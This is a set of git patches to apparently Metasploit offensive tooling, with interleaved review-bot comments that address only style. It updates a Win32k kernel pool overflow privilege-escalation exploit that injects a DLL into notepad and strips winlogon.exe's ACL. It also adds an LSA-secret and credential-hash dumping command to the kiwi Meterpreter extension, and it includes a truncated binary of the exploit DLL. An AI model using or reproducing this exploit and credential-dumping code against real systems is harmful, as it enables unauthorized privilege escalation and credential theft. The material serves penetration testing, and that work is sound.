a7893e8d85..38caa762c4 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" ( POPD ) +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building CVE-2013-1300 (schlamperei)" + PUSHD CVE-2013-1300 + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + IF "%ERRORLEVEL%"=="0" ( ECHO "Building bypassuac (on-disk)" PUSHD bypassuac 
diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb similarity index 74% rename from modules/exploits/windows/local/ms13_058_schlamperei.rb rename to modules/exploits/windows/local/ms13_053_schlamperei.rb index 9deaf504e2..cc072c3a6c 100644 --- a/modules/exploits/windows/local/ms13_058_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -18,16 +18,21 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'ms13_053_schlamperei', + 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ - A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox. + A kernel pool overflow in Win32k which allows local privilege escalation. + The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). + This allows any unprivileged process to freely migrate to winlogon.exe, achieving + privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. + NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Nils&Jon (MWR) - original exploit', - 'Donato Capitella - ported to metasploit', - 'Ben Campbell - ported to metasploit' + 'Nils', #Original Exploit + 'Jon', #Original Exploit + 'Donato Capitella ', # Metasploit Conversion + 'Ben Campbell ' # Help and Encouragement ;) ], 'Arch' => ARCH_X86, 'Platform' => 'win', @@ -58,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Local def check os = sysinfo["OS"] - if (os =~ /windows/i) == nil + unless (os =~ /windows/i) return Exploit::CheckCode::Unknown end 
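Review bot: The new `'Description'` text has a typo in its last sentence, "winlogon.exe is lickely to crash"; it should read `NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.` This string is shown to users in the module info, so it is worth fixing before merge. The trailing comments in the `'Author'` list are also spaced inconsistently (`#Original Exploit` against `# Metasploit Conversion`); `# Original Exploit` would match the rest.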
@@ -70,7 +75,11 @@ class Metasploit3 < Msf::Exploit::Local when 7600 return Exploit::CheckCode::Vulnerable when 7601 - return Exploit::CheckCode::Vulnerable if revision <= 1800 + if branch == 18 + return Exploit::CheckCode::Vulnerable if revision < 18176 + else + return Exploit::CheckCode::Vulnerable if revision < 22348 + end end return Exploit::CheckCode::Unknown end @@ -87,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end - if check != Exploit::CheckCode::Vulnerable - fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + unless check == Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end print_status("Launching notepad to host the exploit...") - notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + notepad_process_pid = cmd_exec_get_pid("notepad.exe") begin - process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError print_status("Operation failed. Trying to elevate the current process...") @@ -102,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") 
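Review bot: The thresholds `18176` and `22348` in the `when 7601` branch of `check` are bare numbers with no comment saying which file version and which update they correspond to, and `branch` and `revision` are computed outside this hunk, so a reader cannot verify them here. A comment above `if branch == 18`, such as `# first fixed revision per servicing branch (source: <advisory or KB reference>)`, would make the check auditable. Separately, a 7601 build at or above its threshold falls through to `Exploit::CheckCode::Unknown`; if these revisions are the first fixed ones, returning `Exploit::CheckCode::Safe` there would report the patched state accurately.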
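Review bot: The two `fail_with` calls in this hunk qualify the failure constant differently: the unchanged 64-bit check uses `Failure::NoTarget`, while the changed line uses `Exploit::Failure::NotVulnerable`. Picking one form, e.g. `fail_with(Failure::NotVulnerable, "Exploit not available on this system")`, keeps the method consistent. The enclosing method starts and ends outside the hunk.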
@@ -110,9 +119,9 @@ class Metasploit3 < Msf::Exploit::Local thread = process.thread.create(exploit_mem + offset) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) - - processes = client.sys.process.get_processes - processes.each do |p| + + + client.sys.process.each_process do |p| if p['name'] == "winlogon.exe" winlogon_pid = p['pid'] print_status("Found winlogon.exe with PID #{winlogon_pid}") From a9758413c0dd7f12fb5959d0e4077deb11789406 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 14 Mar 2014 19:50:01 +1000 Subject: [PATCH 061/853] Add lsa secret dumps plus other tweaks --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 76 ++++++++++++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 48 ++++++++---- .../ui/console/command_dispatcher/kiwi.rb | 42 +++++++++- 3 files changed, 147 insertions(+), 19 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 344ee25912..e50b6aa728 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb 
@@ -43,6 +43,46 @@ class Kiwi < Extension ]) end + def lsa_dump + request = Packet.create_request('kiwi_lsa_dump_secrets') + + response = client.send_request(request) + + result = { + :major => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ), + :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), + :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), + :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), + :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :nt6keys => [], + :secrets => [] + } + + response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| + result[:nt6keys] << { + :id => to_guid(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID)), + :value => to_hex_string(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)) + } + end + + response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s| + r = { + :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), + :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), + :ntlm => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM)), + :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), + :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD) + } + + r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) + r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) + + result[:secrets] << r + end + + return result + end + def golden_ticket_use(ticket) request = Packet.create_request('kiwi_golden_ticket_use') request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) 
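Review bot: `lsa_dump` has no doc comment, and the shape of the hash it returns is not obvious to a caller. In particular, `:current` and `:old` hold the value of `TLV_TYPE_KIWI_LSA_SECRET_CURR` / `TLV_TYPE_KIWI_LSA_SECRET_OLD` when present, and otherwise fall back through `||=` to a space-separated hex dump of the `_RAW` TLV, so a consumer cannot tell which form it received. I would add a short comment above `def lsa_dump` listing the keys (`:major`, `:minor`, `:compname`, `:syskey`, `:nt5key`, `:nt6keys`, `:secrets`) and describing that fallback, or keep the raw form under its own key, e.g. `r[:current_raw] = to_hex_dump(...)`. The trailing `return result` can be just `result`.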
@@ -73,10 +113,10 @@ class Kiwi < Extension :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME), :domain => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN), :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), - :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), - :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), - :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), - :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) + :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), + :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), + :lm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH)), + :ntlm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)) } end @@ -110,6 +150,34 @@ class Kiwi < Extension def kerberos return scrape_passwords(PWD_ID_SEK_KERBEROS) end + +protected + + def to_hex_dump(bytes) + return nil unless bytes + + bytes.each_byte.map { |b| + b.to_s(16).rjust(2, '0') + }.join(' ') + end + + def to_hex_string(bytes) + return nil unless bytes + bytes.unpack('H*')[0] + end + + def to_guid(bytes) + return nil unless bytes + s = bytes.unpack('H*')[0] + parts = [ + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], + s[14, 2] + s[12, 2], + s[16, 4], + s[20, 12] + ] + "{#{parts.join('-')}}" + end end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 46efabf911..4011729986 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb 
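Review bot: `to_guid` in the new `protected` section only guards against nil, but its slicing assumes a 16-byte value. For shorter input a leading slice such as `s[6, 2]` is nil and the `+` raises NoMethodError, or the method returns a truncated GUID; the bytes come from a response TLV (see the `lsa_dump` hunk). A length guard such as `return nil unless bytes && bytes.bytesize == 16` would make a malformed key id degrade to nil like the other helpers. In the hunks shown, these helpers are only called from within the class, so `private` would be a tighter fit than `protected`.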
@@ -5,21 +5,41 @@ module Meterpreter
 module Extensions
 module Kiwi
-TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
-TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2)
-TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
-TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
-TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
-TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6)
-TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7)
-TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
-TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2)
+TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6)
+TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7)
+TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
-TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
-TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11)
-TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12)
-TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
-TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14)
+TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11)
+TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12)
+TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
+TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14)
+
+TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15)
+TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16)
+TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 17)
+TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 18)
+TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 19)
+TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 20)
+TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21)
+TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 22)
+TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 23)
+TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 24)
+
+TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 25)
+TLV_TYPE_KIWI_LSA_SECRET_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 26)
+TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 27)
+TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 28)
+TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 29)
+TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30)
+TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31)
+TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32)
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
index 39f6be508f..2b6aaa49fd 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
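Review bot: `TLV_TYPE_KIWI_LSA_KEYCOUNT` and `TLV_TYPE_KIWI_LSA_KEYIDX` are declared here, but none of the Ruby hunks visible in this commit reads them. `lsa_dump` walks the `TLV_TYPE_KIWI_LSA_NT6KEY` groups and the console command counts with `lsa[:nt6keys].length`. If they exist only to mirror the extension's numbering, a comment above them such as `# sent by the extension, not consumed by the Ruby client` would save the next reader a search. The fourteen existing constants appear as removed and re-added lines that seem to differ only in alignment, which buries the real additions; a separate whitespace commit would keep this diff readable.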
@@ -45,7 +45,8 @@ class Console::CommandDispatcher::Kiwi
 "creds_kerberos" => "Attempt to retrieve Kerberos creds",
 "creds_all" => "Attempt to retrieve all credentials",
 "golden_ticket_create" => "Attempt to create a golden kerberos ticket",
- "golden_ticket_use" => "Attempt to use a golden kerberos ticket"
+ "golden_ticket_use" => "Attempt to use a golden kerberos ticket",
+ "lsa_dump" => "Attempt to dump LSA secrets"
 }
 end
@@ -79,6 +80,45 @@ class Console::CommandDispatcher::Kiwi
 return true
 end
+ def cmd_lsa_dump(*args)
+ get_privs
+
+ print_status("Dumping LSA secrets")
+ lsa = client.kiwi.lsa_dump
+
+ # the format of this data doesn't really lend itself nicely to
+ # use within a table so instead we'll dump in a linear fashion
+
+ print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major]
+ print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname]
+ print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey]
+ print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key]
+ print_line
+ print_line("NT6 Key Count : #{lsa[:nt6keys].length}")
+
+ if lsa[:nt6keys].length > 0
+ print_line
+ lsa[:nt6keys].to_enum.with_index(1) do |k, i|
+ print_line("#{i.to_s.rjust(2, ' ')}. ID : #{k[:id]}")
+ print_line("#{i.to_s.rjust(2, ' ')}. Value : #{k[:value]}")
+ end
+ end
+
+ print_line
+ print_line("Secret Count : #{lsa[:secrets].length}")
+ if lsa[:secrets].length > 0
+ lsa[:secrets].to_enum.with_index(1) do |s, i|
+ print_line
+ print_line("#{i.to_s.rjust(2, ' ')}. Name : #{s[:name]}")
+ print_line("#{i.to_s.rjust(2, ' ')}. Service : #{s[:service]}") if s[:service]
+ print_line("#{i.to_s.rjust(2, ' ')}. NTLM : #{s[:ntlm]}") if s[:ntlm]
+ print_line("#{i.to_s.rjust(2, ' ')}. Current : #{s[:current]}") if s[:current]
+ print_line("#{i.to_s.rjust(2, ' ')}. Old : #{s[:old]}") if s[:old]
+ end
+ end
+ print_line
+ end
+
 def cmd_golden_ticket_create(*args)
 if args.length != 5
 print_line("Usage: golden_ticket_create user domain sid tgt ticketpath")
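Review bot: `cmd_lsa_dump` ends on a bare `print_line`, so it returns that call's value, while the command method just above the hunk ends with `return true`. Closing with `return true` would keep the dispatcher methods consistent; what the dispatcher does with the value is not visible here. The index prefix `i.to_s.rjust(2, ' ')` is rebuilt for every printed line, seven times across the two loops, and reads better computed once per entry as `prefix = i.to_s.rjust(2, ' ')`. The `*args` parameter is never used, so a stray argument is silently ignored, unlike `cmd_golden_ticket_create` below, which checks `args.length` and prints a usage line.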
From 409787346e11b9d9a211d2fa1223056286207fcc Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 12 Mar 2014 21:51:11 +1000 Subject: [PATCH 062/853] Bring build tools up to date, change some project settings This commit brings the source into line with the general format/settings that are used in other exploits. --- .../cve-2013-1300/schlamperei.x86.dll | Bin 0 -> 72192 bytes .../exploits/cve-2013-1300/cve-2013-1300.sln | 8 +++--- .../schlamperei.c} | 24 +++++++++--------- .../schlamperei.vcxproj} | 23 ++++++++++++++--- .../windows/local/ms13_053_schlamperei.rb | 15 ++++++----- 5 files changed, 44 insertions(+), 26 deletions(-) create mode 100755 data/exploits/cve-2013-1300/schlamperei.x86.dll rename external/source/exploits/cve-2013-1300/{cve-2013-1300/cve-2013-1300.cpp => schlamperei/schlamperei.c} (91%) mode change 100644 => 100755 rename external/source/exploits/cve-2013-1300/{cve-2013-1300/cve-2013-1300.vcxproj => schlamperei/schlamperei.vcxproj} (80%) 
diff --git a/data/exploits/cve-2013-1300/schlamperei.x86.dll b/data/exploits/cve-2013-1300/schlamperei.x86.dll new file mode 100755 index 0000000000000000000000000000000000000000..d4910ae3e8c6c9b82bff894843b2f79d77aac46f GIT binary patch literal 72192 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 